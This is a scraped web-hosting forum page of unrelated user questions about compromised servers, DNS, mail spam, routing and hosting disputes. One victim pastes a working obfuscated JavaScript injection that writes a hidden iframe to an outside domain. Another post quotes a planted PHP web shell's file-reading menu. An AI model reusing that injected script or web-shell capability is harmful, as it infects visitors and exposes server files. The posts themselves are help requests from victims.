I found out that there were some hidden iframe tags injected on my website. So I grepped and cleaned all html files. Am I supposed to change my ssh/sftp password as well? Is there anything else I'm supposed to do?
View 3 Replies
My hosting provider has told me that my server has been "fully rooted" and the only way to fix it is a reinstallation from scratch. That is very frightening to me because it will take a lot of time to set-up again and this will cause major downtime.
Is there no other way to resolve the issue without reinstallation?
--------------- Quote from hosting provider ---------------
">> Does this mean that my passwords do not need to be changed?
Server is fully rooted, and will need to be reinstalled. Leaving the server online is a very, very serious risk for you. Let me show you some of the powers the hax0rs have at this time from their upload/hax0r script.
Php Safe-Mode Bypass (Read Files)
File:
eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):
Dir:
eg: /etc/
Search
- regexp
Upload
[ Read-Only ]
Make Dir
[ Read-Only ]
Make File
[ Read-Only ]
Go Dir
Go File
--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | LOCUS7S | Generation time: 0.0396 ]-- "
Is it possible that someone on the same network as my server (shared hosted, freebds) could somehow cause my traffic to be diverted to a new url after visitors landed on my website?
I assume this person has access to my home PC also and is reading what I type here etc. Has the ability to allow domains and IP's and divert others on my server, IS in the position to know who to allow and deny (my affiliates, customers etc IP's are recorded etc)
IF this was possible, how would I be able to catch this person out?
Where would I look for evidence of this and what am I looking for?
I don't manage my DNS and asking my server host (my suspect hosts with them too) gets a reply like: I don't understand what your asking? Do you need webaliser stats?
How would someone be able to do what I'm guessing is happening: That people can land on my site.. however, this guy can than redirect them to his own paying page. If I set a link here to my site..he'd soon add its domain to "allowed" etc etc.
I'm thinking I need access to server access to my dns, login info and Last Modified details on those file. I don't have these. I don't know what I'd be looking at if I had them.. and my server tech hasn't offered to look at such things.
My interest is more than intellectual.
Until last weekend my 2 1/;2 year project that has grown in sales volume beyond my expectations. I had had no contact with this person for 8 months and in that time sales where consistent. I Had changed all accesses, IP etc etc. I used to host with him. Then moved hosts since I didn't trust him (same problem back then - sales fell to nothing but traffic grew) moved to my current host.. not long after find HE is now on that host too.. now after I have contact from him again, sales have gone flat without any explanation, even though traffic has increased! 1:300 has become 1:10000 and I have checked everything site side (I'm a webmaster for over 10 years)
I'll be ruined very shortly and I don't know what to do.
I've been handling the design and updates for a local private school for a few years now. They use HostOnce for hosting. Over 2 weeks ago I noticed that when I try to bring the site up in a browser I get a login prompt - [url]. I've submitted several help desk tickets to HostOnce with no response. Since school is starting, I recommended the school change hosting providers. So they bought hosting with GoDaddy who I also use. But now I need to transfer the domain name and I can't get a response from HostOnce. I send an email requesting that they initiate the domain transfer to GoDaddy every day with no response.
Besides a few email addresses and the help desk, there doesn't seem to be any way I can get in touch with anyone at HostOnce. What options do I have left? The school is currently stuck with a site that can't be accessed. The company seems to be in Australia but I've read the phone number listed for them does not work. I'm looking for a US phone number or something.
I have been with HostNine for almost a year now and have had reasonably decent service, until now.
They recently suspended one of my client's accounts. Understandable, the account had some very old PHP files on them. Let me preface this by stating that I am very sympathetic to hosts who have to deal with problem clients who have sites that slow down shared servers for everyone else on them.
I have tried my hardest to work with HostNine to get these files back and ensure that this account is not a problem on their server. I have never once asked for them to restore the account "as is", all have I have asked is that they backup the files and the database for me (I would do it myself, but they locked me out of the account), so that I can investigate the problem and do testing to ensure that it doesn't cause them problems again.
All in all, getting anyone to co-operate has been unsuccessful. Getting a hold of them has been a hassle (from the time I e-mailed them about the issue to the time I received my first response was a span of over 6 hours). Getting them to co-operate has been impossible. Their "Support Manager", Alex, in broken English has told me next to nothing, aside to accuse me of trying to "get around this" and that I would need to move the account to one of their dedicated plans. I have asked that the account simply be backed up, but have not received any response so far, as time ticks away and the client whose account this was becomes more and more frustrated as their files are effectively being "held hostage".
My last complaint is that they never notified myself, nor the client that they had suspended the account.
Has anyone else had problems with trying to get their files back after a host has locked you out of your account? What are my options? Does the hosting company technically "own" the files, simply because they are being hosted on their server?
I keep having certain domains being hijacked and mass emails being sent from them somehow. I've disabled mail within domain control panel for each domain and issue keeps occurring. I've limited # of emails as well to 2-5 per hour but now so many are trying to be sent from my server it is clogging up mail queue and I have to log into server via ssh and run postsuper -d ALL every day or two. It is very frustrating. The only way I can stop it is to disable domain in plesk panel but that is not an option.
What can I do to find the cause of this issue and stop it?
i have set email for some domain to catch all setting. After some time i have a lot of bounce, redirect and rected email to address. How come my email accounts are hijacked and what to do to prevent such things in case of catch all setting.
Here it is noteworthy catcth all used to attract a lot of spam.
Attached is a (badly) drawn diagram of two sites, connected by a vpn.
The site to the left, is network 10.0.0.0/24 which runs a linux server as the router for the network.
The site to the right, is network 10.1.0.0/24 which runs a windows 2003 server as the router for the network.
Now, my problem is, the clients behind the windows 2003 server can ping any machine on the first network because i setup a static route to route all traffic to 10.0.0.0/24 over the vpn interface.
now, my problem is, only the linux server can ping any machine on the windows 2003 network, any client behind the linux server cant seem to route over the interface.
I have the following route on the linux server: .....
Starting point: a working site using a shared IPv4, dedicated IPv6, and SSL. HTTP and HTTPS work, the latter only using SNI of course.
The good news: If I simply allocate an IP resource of 1 to a subscription it is pulled from the pool, assigned to the service node, assigned to the web site, DNS is updated, and the site is automatically changed to using a Dedicated IPv4 and Dedicated IPv6.
The bad news: visitors land on the default web site of the service node, with the default SSL certificate.
Other info: I can't ping the new IP, even though it shows in "ip a l" and /etc/sysconfig/network-scripts/ifcfg-eth0:0. [edited]
After the IP assignment, it is still installed, and /etc/httpd/conf/plesk.conf.d/ip_default/domainname.conf shows the new certificate is being used.
However, a second set of VirtualHost entries is created in server.conf for this IP for ports 80 and 443, with NameVirtualHost enabled on the new IP. The port 443 entry uses the default certificate. Apache's setup this default VirtualHost entry will override the web site configuration because Apache is listening on port 443 with the wrong cert.
If I go to "Change webspace settings" and toggle to Shared IPv4, Dedicated IPv6 the site works again via HTTPS, and Dedicated IPv4 and Dedicated IPv6 breaks it again. Setting the SSL cert to None and back again does not work.
Setting the SSL cert to None, changing to a dedicated IP, and enabling SSL results in the server being inexplicably inaccessible...browsers no longer connect to either the default site or the correct site, and I don't see any entries in the vhosts's logs.
is there anyone knows for a good hosting located in uk,which is allowed : adult site and casino betting online site ?
im looking for vps and dedicated server.
please help me i really need as soon as possible.thx
I run basicly run two main site.
1.Forum big one .
2.File and image sharing site.
(image sharing site generates thumbnails which produces lots of hits)
In these conditions how much difference can lighttpd can do as compared to apache for keeping my 600 MB Ram VPS host constant.
I'm on a short assignment to inventory and manage the fixed assets of a small company, and we've just bought a web-based database for this purpose. While I'm pretty good at administering/running local databases, the web part has me stymied. Our company is between IT people, and there's no one on site with any more idea than I have about what's going on!!
Here's what I have so far:
--The company has a website which I'll call "ourwebsite.org" -- which I think, from searching the IP address the website points to, is hosted by HostMySite.com.
--There's also a record in DNS Management with the same name (ourwebsite.org), but pointing to our little server's local IP address.
--I need to find a way to get my database -- which I can access on the network at (server's IP address)/database (ie 0.0.00.0/database) -- online. I tried creating records in DNS Management (for ex., assets.ourwebsite.org) that point to our server's IP (the one that, if I type it in on the network, I can get to the site I'm looking for), but get generic "can't find the page" or "can't connect to the server" errors, even after 72 hours, when trying to access it from off the network.
--If I browse to assets.ourwebsite.org/database on the server itself, I get to the website! But if I go to that page from any other computer, on or off the network, it doesn't work.
--The Server is running Windows Server 2003
So, what are my options? Do I have to talk to the HostMySite.com people to add this page? Shouldn't I just be able to use my server's name (ourcompanyadc.ourcompany.org) and have that route to the server? What's going on here! Is there a simple way to get a tiny local-server-hosted website online outside of the network?
I just transferred a domain from one cpanel box to another.
Now, that site is showing someone else's page. I've seen this happen before, but I cannot remember the fix.
the virtual host in httpd.conf is fine, shows proper IP, username, docroot, etc
Dns zone is fine as well.
The domain is using the server's main IP, so that's not the cause.
Centos 5 / cpanel 11 / apache 1.3 / php 4x
is possible to relay a site (say abc.com) from my site (xyz.com), where a viewer should be able to see the site (abc.com) through my site's IP.
View 4 Replies View Relatedi've got a client who gave me their PW and ID to log into their servers. But for whatever reason, i can't seem to login despite them giving me the right PW and ID.
I want to know if there are other possible reasons for not being able to login via my FTP client [which is filezilla]?
I found the CPU/MEM/MySQL usage in cPanel (how have I missed it before and when talking with my host (fully managed Liquideb VPS2 768MB RAM 1024 Burst (though it reads it as that I think). Anyways it seems my friends sites are using allot of CPU and RAM. See attached screenshot. He is paying for shared hosting but I was stupid to give him unlimited sites but 1GB space 10GB bandwidth. Am I over reacting, or his his $16/month or 1% of available space (based on 95GB for paying sites) is he using too much?
Here's the screenshot. He is FIshbon, Empower, and rhea and both sites are drupal (along with 2 of my sites one being macwrite and the other personal).
I knw that it is not legal to provide mp3 files for downloads.But still there are thousands of sites which are offering free mp3 downloads.How they are managing it?Are their servers in a country where it is legal.If so,Which country's servers are best for these kind of sites?
View 6 Replies View RelatedMy site host in Dreamhost.
why Adulu.com down but Adolu.com not.
check it out
I'm getting emails that my site is down and does not load. But it's working find for others. 1 person is in Vancouver, and the other in Ontario.
View 4 Replies View RelatedI got this in my email cpsrvd failed @ Tue Feb 6 08:33:22 2007. A restart was attempted automagicly.
I checked that all of my sites that are using php program doesn't work. Genetips.com doesn't work.
So I restarted the server.
Now, the site "work" but they cannot access database.
Accessing genetips.com will show that databases cannot be accessed.
These guys ripped our entire site - if they will do that, imagine what they will do to you if you sign up with them.
Ridiculous.
[url]
These guys are unbelievable they didn't even comment out our name or address, shocking.
I am doing a site for a local charity. I have decided to create it with the Joomla! CMS. Now, currently the old site (frontpage) is hosted on a Zeus system (whatever that is!).
Does anyone know about this type of host and if its compatible?
I have Joomla hosted locally at the moment to start development but have no idea if its going to work or what configuration will need to be done when I try to port it over.
The only thing they have told me is that I will have to destroy the old site to get the new one up and running (because of Frontpage settings).
A client's site was hacked last week and spyware or some kind of trojan was put on it. I found some files that didn't belong in the images folder and proceeded to delete them, however, when I submitted the site back to Google for review, the report came back saying there was still malware on the site. They didn't provide me with the location of the spyware, so what can I do to find it and delete it?
View 6 Replies View RelatedOne of my clients has just sent me a bounced email to an address she had never heard of. This made me suspect my server had been hacked and was being used for a scam.
Sure enough, I found a file in one of my folders, that was related to a Bank of America scam.
I have since put a password on this folder. But does anyone have any advice on how to secure the site to prevent this happening again? It is a shopping cart and the 'rogue' file was in the admin area of the shopping cart.
I had a client ask me earlier if there was any downsides to having his main site be SSL only ,not his billing his actual site.
For exmaple it would be https://www.yoursite.com rather than the normal http and having that redirect to the https.
Obviously he would need all his images being linked to https in order for it to be secure but apart from that, I couldn't think of any of the top of my head, I was wondering what you guys all thought.
As somebody who has bought the 'Build Your Own ASP.NET 2.0 Web Site Using C# & VB' by CRISTIAN DARIE and ZAK RUVALCABA, I wonder what Hosting deals are considered the best and most user friendly (robust and support).
By this I mean, the most competitive for users like me who are just learning the technology and maybe want to set up some basic book examples online using SQL 2005.
my site cannot run php files
move from server 1 to server 2
another site no ploblem move from server 1 to server 2 too
What ploblem i need fix this
here my site
[url]
My site keeps going down every 10 minutes. It'll be online for 10 minutes, than down for another 10 minutes. It's been happening for like the past 3-4 hours. I can log into WHM without any problems, but the site itself site keeps crashing!
And last week somehow I found the code in all my index and home pages. Not any of my other pages like food.html or sleep.php, just the index.php and home.html type of pages.
Quote:
<script type="text/javascript" src="swfobject.js"></script>
<body><script type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,11 4,34,59,118,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,11 4,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,3 9,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104, 50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114, 39,43,39,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52, 52,59,125,32,118,97,114,32,109,110,98,113,61,52,51,48,52,49,56,50,52))</script>
</body>
</html>
What the heck is going on?
Is there any pro`s / cons about setting up a site (1 page/ image)on the url of the server fqdn.
What`s best practise, does it even matter?
ie.
[url]
[url]
I dont particularly require a site on the url and www.mydomain.com 404`s at present.
I am building a Web Registration System so people can register to attend seminars that I will be giving.
What basic web-hosting functionality and features will I need when I get a web-hosting account?
(I plan on using PHP and MySQL, so that is a given!)
Questions:
1.) For starters, can I safely host my site on a "Shared" server?
2.) I assume I'll need to buy a Static IP Address, right?
3.) And probably a Security Certificate as well for the Registration part?
4.) Anything else obvious?
What is the best way to make sure my website is 100% available all the time.
View 3 Replies View Related
